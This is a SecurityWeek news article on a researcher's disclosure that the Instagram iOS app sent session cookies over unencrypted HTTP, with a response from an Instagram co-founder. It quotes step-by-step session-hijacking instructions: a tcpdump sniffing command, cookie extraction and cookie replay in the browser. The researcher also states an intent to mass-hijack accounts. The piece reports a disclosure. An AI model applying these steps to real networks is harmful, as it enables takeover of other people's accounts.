Connect with us

Hi, what are you looking for?

SecurityWeekSecurityWeek

Vulnerabilities

Instagram App Exposes Users to Man-in-the-Middle Attacks: Researcher

A security researcher has released details of an issue affecting the Instagram application for iOS devices that exposes users to hackers launching man-in-the-middle attacks.

A security researcher has released details of an issue affecting the Instagram application for iOS devices that exposes users to hackers launching man-in-the-middle attacks.

“In a nutshell some API endpoints are HTTP which means I can most probably take control of your account if we’re on the same wifi,” researcher Stevie Graham tweeted July 27. “Denied bug bounty. Next step is to write automated tool enabling mass hijacking of accounts.”

Facebook, which purchased Instagram in 2012, did not respond to a request for comment before publication. However, Instagram co-founder Mike Krieger responded to the situation on the Hacker News site by stating that Instagram has been steadily increasing its HTTPS coverage.

“For the remainder of the app, especially latency-sensitive read endpoints like the main feed and other browsing experiences, we’re actively working on rolling out HTTPS while making sure we don’t regress on performance, stability, and user experience,” Krieger wrote. “This is a project we’re hoping to complete soon, and we’ll share our experiences in our eng blog so other companies can learn from it as well.”

In his description of the situation, Graham explained that Instagram makes API calls to non-HTTPS endpoints with session cookies in the request headers, which allows full session hijacking by an attacker.

The issue can be recreated by doing the following, he wrote:

  • Jump on an open network or WEP encrypted wifi access point
  • Put your network interface into promiscuous mode filtering on i.instagram.com:

sudo tcpdump -In -i en0 -s 2048 -A dst i.instagram.com

  • Wait for someone to use the Instagram iOS app on the same network
  • Extract cookie request header from the resulting output
  • Use sessionid cookie parameter to make any API call as that user Even https endpoints like direct messages.

“I was able to perform a session hijack on my own account on my laptop while someone else browsed Instagram on my iPhone,” he wrote.

Graham wrote that he was also able to take the cookie sniffed from the iOS app, go to instagram.com as an unlogged in user, set document.cookie = $COOKIE and navigate to a profile and see he was logged in as that user.

“There is some screwy behaviour where ‘instagram.com/’ gets into redirect loop, I will see if I can fix that,” he wrote. “However going to ‘instagram.com/someones_profile’ works and shows me as logged in. I think this attack is extremely severe because it allows full session hijack and is easily automated. I could go to the Apple Store tomorrow and reap thousands of accounts in one day, and then use them to post spam.”

Advertisement. Scroll to continue reading.
Written By

Marketing professional with a background in journalism and a focus on IT security.

Click to comment

Trending

Daily Briefing Newsletter

Subscribe to the SecurityWeek Email Briefing to stay informed on the latest threats, trends, and technology, along with insightful columns from industry experts.

Discover strategies for vendor selection, integration to minimize redundancies, and maximizing ROI from your cybersecurity investments. Gain actionable insights to ensure your stack is ready for tomorrow’s challenges.

Register

Dive into critical topics such as incident response, threat intelligence, and attack surface management. Learn how to align cyber resilience plans with business objectives to reduce potential impacts and secure your organization in an ever-evolving threat landscape.

Register

People on the Move

The City of Phoenix has promoted Mitch Kohlbecker to the role of Chief Information Security Officer.

Gigamon has promoted Tony Jarjoura to CFO and Ram Bhide has been hired as Senior VP of engineering.

Cloud security firm Mitiga has appointed Charlie Thomas as Chief Executive Officer.

More People On The Move

Expert Insights

Daily Briefing Newsletter

Subscribe to the SecurityWeek Email Briefing to stay informed on the latest cybersecurity news, threats, and expert insights. Unsubscribe at any time.